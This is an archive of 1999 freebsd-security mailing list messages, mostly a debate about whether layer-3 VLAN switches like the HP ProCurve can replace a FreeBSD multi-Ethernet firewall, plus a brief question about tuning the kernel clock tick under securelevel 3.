Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 23:19:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 8941514BD3 for ; Fri, 20 Aug 1999 23:19:35 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I4Tw-0007Ww-00; Sat, 21 Aug 1999 00:18:24 -0600 Message-ID: <37BE44AF.67A392E6@softweyr.com> Date: Sat, 21 Aug 1999 00:18:23 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Cliff Skolnick Cc: "Rodney W. Grimes" , jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cliff Skolnick wrote: > > On Fri, 20 Aug 1999, Wes Peters wrote: > > > Ah hell, just buy a switch/router and get the whole mess in one box. If you > > buy the RIGHT one, you can get your wide area/internet link AND your firewall > > all in the same box. Anyone who thinks a router provides more security than > > a VLAN switch doesn't understand how VLANs work. > > With a nice router I can almost always set up filtering and policys on how > ports exchange traffic. It's really hard to create a good packet filter on > a layer 2 device, Who said anything about layer 2 devices? Both the switches I referred to are layer 3 devices with a wide range of network services available. The Xylan box offers Checkpoint FW-1 firewall and advanced routing if you want to get really involved, though you'll need a model with more RAM and Flash. > 4 Port Ethernet cards are less than $500 now so you > can build the box with a really low per-port cost. The box costs $2000 for > 8 ports at about $250/port. You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 for 40 switched 10/100 ports with layer 3 functionality and VLAN support. That's $47 port port, much lower than your $250/port, with a LOT more performance also. The Tolly Group recently tested it and found it capable of sustaining full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going to hit 4 Gbps throughput. > Sure there are some switches that do provide extensive filtering and even > load balancing, but those are a usually a bit more than $250/port. Not anymore. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 0: 3:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 254611505D for ; Sat, 21 Aug 1999 00:03:47 -0700 (PDT) (envelope-from cliff@steam.com) Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id AAA15011; Sat, 21 Aug 1999 00:03:43 -0700 (PDT) Date: Sat, 21 Aug 1999 00:03:43 -0700 (PDT) From: Cliff Skolnick X-Sender: cliff@lazlo.internal.steam.com To: Wes Peters Cc: freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BE44AF.67A392E6@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is starting to drift a bit away, but I'm still saying a FreeBSD machine with a bunch of ethernets is cheaper and more versatile than a switch that can do real firewalling. Granted I will admit the performance will not be gigabit, but for the most part you can filter traffic from one or two DS3s, and most firewalls are between the LAN and WAN. On Sat, 21 Aug 1999, Wes Peters wrote: > Who said anything about layer 2 devices? Both the switches I referred to > are layer 3 devices with a wide range of network services available. The > Xylan box offers Checkpoint FW-1 firewall and advanced routing if you want > to get really involved, though you'll need a model with more RAM and Flash. And I'm sure the checkpoint software is many thousands of dollars, which will raise your port cost quite a bit. And that damn 25/50/unlimited licensesing is not cheap. Unfortunately they did not have prices on the Xylan or Checkpoint site, and web queries with product numbers turned up only checkpoint and xylan pages. > > 4 Port Ethernet cards are less than $500 now so you > > can build the box with a really low per-port cost. The box costs $2000 for > > 8 ports at about $250/port. > > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 > for 40 switched 10/100 ports with layer 3 functionality and VLAN support. > That's $47 port port, much lower than your $250/port, with a LOT more performance > also. The Tolly Group recently tested it and found it capable of sustaining > full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going > to hit 4 Gbps throughput. Did you read the manual? Not much layer 3 there at all, but it will let you filter based on IP multicast. If you can do more than this, please point me to the page number in the manual. > > Sure there are some switches that do provide extensive filtering and even > > load balancing, but those are a usually a bit more than $250/port. > > Not anymore. The key work is "extensive", nice range of services to filter on, logging, statefull inspection, etc. Cliff -- | Cliff Skolnick | "They that can give up essential liberty to | | Steam Tunnel Operations | obtain a little temporary safety deserve | | cliff@steam.com | neither liberty nor safety." | | http://www.steam.com/ | -- Benjamin Franklin, 1759 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 0:28:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E9F5B15AC5 for ; Sat, 21 Aug 1999 00:28:10 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id BAA58691; Sat, 21 Aug 1999 01:28:09 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id BAA41908; Sat, 21 Aug 1999 01:28:20 -0600 (MDT) Message-Id: <199908210728.BAA41908@harmony.village.org> To: Wes Peters Subject: Re: OpenBSD Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 18 Aug 1999 13:24:28 MDT." <37BB086C.6CC4261E@softweyr.com> References: <37BB086C.6CC4261E@softweyr.com> <4.2.0.58.19990818090642.04808ec0@localhost> Date: Sat, 21 Aug 1999 01:28:20 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37BB086C.6CC4261E@softweyr.com> Wes Peters writes: : At least this one managed to stay dead for more than a year this : time. Please don't encourage this by following up to it. Let's just say that a huge order for ice skates hasn't shipped to the warmer realms yet, nor is it expected to anytime soon. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 9:17:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 183E91511E for ; Sat, 21 Aug 1999 09:17:17 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from lithium.scientia.demon.co.uk ([192.168.0.3] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.032 #1) id 11IDid-0003cd-00; Sat, 21 Aug 1999 17:10:11 +0100 Received: (from ben) by lithium.scientia.demon.co.uk (Exim 3.032 #1) id 11IDiX-0006Me-00; Sat, 21 Aug 1999 17:10:05 +0100 Date: Sat, 21 Aug 1999 17:10:04 +0100 From: Ben Smithurst To: Greg Black Cc: freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time Message-ID: <19990821171004.A24337@lithium.scientia.demon.co.uk> References: <19990820214657.1605.qmail@alice.gba.oz.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <19990820214657.1605.qmail@alice.gba.oz.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greg Black wrote: > If you happen to have a machine that needs its regular tweaks by > ntpdate to exceed half a second, then you can adjust the kernel > tick a few units either side of its default setting of 10000 so > that things stay relatively stable. Where should I change this? I tried changing the value in /sys/conf/param.c (after copying it to the compile directory) and it seems to have had no effect. I changed it to 9997, I calculated this as the best value given that my machine's clock seems to gain about 1 second per hour. The clock still seems to be running fast, according to the adjustments made by ntpdate. The new value shows up in kern.clockrate so I must have got something right. root@scientia:/sys/compile/SCIENTIA# sysctl kern.clockrate kern.clockrate: { hz = 100, tick = 9997, tickadj = 5, profhz = 1024, stathz = 128 } -- Ben Smithurst | PGP: 0x99392F7D ben@scientia.demon.co.uk | key available from keyservers and | ben+pgp@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 22:36:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.wolves.k12.mo.us (mail.wolves.k12.mo.us [207.160.214.1]) by hub.freebsd.org (Postfix) with ESMTP id 92BF014A14 for ; Sat, 21 Aug 1999 22:36:21 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from mail.wolves.k12.mo.us (cdillon@mail.wolves.k12.mo.us [207.160.214.1]) by mail.wolves.k12.mo.us (8.9.3/8.9.2) with ESMTP id AAA80627; Sun, 22 Aug 1999 00:35:50 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Sun, 22 Aug 1999 00:35:49 -0500 (CDT) From: Chris Dillon To: Wes Peters Cc: Cliff Skolnick , Bigby Findrake , jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BE35AE.23088FB2@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 20 Aug 1999, Wes Peters wrote: > > Check out http://www.shopper.com/prdct/721/192.html for a head start on your > shopping. ;^) > Indeed, nice stuff. :-) > > For a better price/port, see http://www.shopper.com/prdct/768/063.html > These guys are very hard to beat -- for a few more months. ;^) > HP is lowballing everybody on price with this switch. In case you're wondering, there's also a $400 rebate on top of that already-low price. I'm buying one of these puppies next week to see how it works out. Pretty hard to pass up a 40-port 10/100 switch with pretty good expandability for only $1400. Lifetime warranty, too(!). The only Gotcha I've found by looking at the specs is that it only has a 3.8Gbit/sec backplane. This is only enough to keep 19 100mbit ports saturated at full duplex, but you're also paying less money for this 40-port switch than most other halfway-decent 24-port switches. I wonder if local switching takes place on each of the "blades" (expansion modules). I still think its worth the money even with the limited backplane. -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and Alpha architectures (SPARC under development). ( http://www.freebsd.org ) "One should admire Windows users. It takes a great deal of courage to trust Windows with your data." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 23:37:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.wolves.k12.mo.us (mail.wolves.k12.mo.us [207.160.214.1]) by hub.freebsd.org (Postfix) with ESMTP id B0A8E14C88 for ; Sat, 21 Aug 1999 23:37:04 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from mail.wolves.k12.mo.us (cdillon@mail.wolves.k12.mo.us [207.160.214.1]) by mail.wolves.k12.mo.us (8.9.3/8.9.2) with ESMTP id BAA80806; Sun, 22 Aug 1999 01:34:48 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Sun, 22 Aug 1999 01:34:47 -0500 (CDT) From: Chris Dillon To: Wes Peters Cc: Cliff Skolnick , "Rodney W. Grimes" , jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BE44AF.67A392E6@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 21 Aug 1999, Wes Peters wrote: > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 > for 40 switched 10/100 ports with layer 3 functionality and VLAN support. > That's $47 port port, much lower than your $250/port, with a LOT more performance > also. The Tolly Group recently tested it and found it capable of sustaining > full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going > to hit 4 Gbps throughput. I noticed the only "L3 support" from the spec sheets of the 4000M and 8000M is IGMP snooping to control multicast traffic, and "protocol filtering" only on the 8000M. Nothing close to IP routing, however (not that you said it did, specifically, just clarifying). When the Tolly Group said they could "sustain full wire speed on all 40 ports", was that testing each one at a time or all at once? My math isn't quite warped enough to allow 40 100Mbit/FD ports to all be saturated with only a 3.8Gbit backplane, unless local switching occurs on each of the port modules, and even then the "throughput test" would have to take that into account and not try to move too much data across the backplane. You may also notice that the HP ProCurve 9304M and 9308M Routing Switches (these DO have IP/IPX routing, but they certainly aren't cheap... nice kit, BTW), bear an uncanny resemblance in both looks, specs, and a digit of their model name to the Foundry Networks BigIron 4000 and 8000, respectively. -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and Alpha architectures (SPARC under development). ( http://www.freebsd.org ) "One should admire Windows users. It takes a great deal of courage to trust Windows with your data." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 21 23:51:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id C0CA015009 for ; Sat, 21 Aug 1999 23:51:36 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id XAA31700; Sat, 21 Aug 1999 23:49:10 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908220649.XAA31700@gndrsh.dnsmgr.net> Subject: Re: multiple machines in the same network In-Reply-To: from Chris Dillon at "Aug 22, 1999 01:34:47 am" To: cdillon@wolves.k12.mo.us (Chris Dillon) Date: Sat, 21 Aug 1999 23:49:10 -0700 (PDT) Cc: wes@softweyr.com (Wes Peters), cliff@steam.com (Cliff Skolnick), service_account@yahoo.com (jay d), yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Sat, 21 Aug 1999, Wes Peters wrote: > > > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 > > for 40 switched 10/100 ports with layer 3 functionality and VLAN support. > > That's $47 port port, much lower than your $250/port, with a LOT more performance > > also. The Tolly Group recently tested it and found it capable of sustaining > > full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going > > to hit 4 Gbps throughput. > > I noticed the only "L3 support" from the spec sheets of the 4000M and > 8000M is IGMP snooping to control multicast traffic, and "protocol > filtering" only on the 8000M. Nothing close to IP routing, however > (not that you said it did, specifically, just clarifying). When the > Tolly Group said they could "sustain full wire speed on all 40 ports", > was that testing each one at a time or all at once? My math isn't > quite warped enough to allow 40 100Mbit/FD ports to all be saturated > with only a 3.8Gbit backplane, unless local switching occurs on each > of the port modules, and even then the "throughput test" would have to > take that into account and not try to move too much data across the > backplane. Your making a common mistake here when an ``ALL PORTS FULL LOAD'' test is done, if you have 40 ports all being sent data at 100MB/sec that data is going to have to come out on 40 ports someplace, so you only need 4Gbit/sec of backplane to do this. Thats 4G bytes of data in, 4G accross the backplane, and 4G back out of the box. Maybe a drawing would help: rxpair of port 1 > +---------+ > txpair of port n rxpair of port 2 > | | .... rxpair of port 3 > | Fabric | > txpair of port 3 ... | | > txpair of port 2 rxpair of port n > +---------+ > txpair of port 1 As you can see the Fabric only has to handle 40 x 100Mb/s to keep all 40 ports busy at full duplex. The 3.8 Gb/s spec comes up a little short, but only buy 2 ports... and it had better be darned efficent as far as overhead goes... Allowing the port cards to short circuit bridge (and every switch chip set I have looked at does this) makes it easy to pass this test, infact you can do it with 0 load on the backplane. My drawing above tends to put the maximal load on a switches backplane, but unless the vendor tells you exactly how they tested the benchmark is like any other benchmark without all the nitty gritty details, total sales and marketing propoganda. > You may also notice that the HP ProCurve 9304M and 9308M Routing > Switches (these DO have IP/IPX routing, but they certainly aren't > cheap... nice kit, BTW), bear an uncanny resemblance in both looks, > specs, and a digit of their model name to the Foundry Networks BigIron > 4000 and 8000, respectively. :-) -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message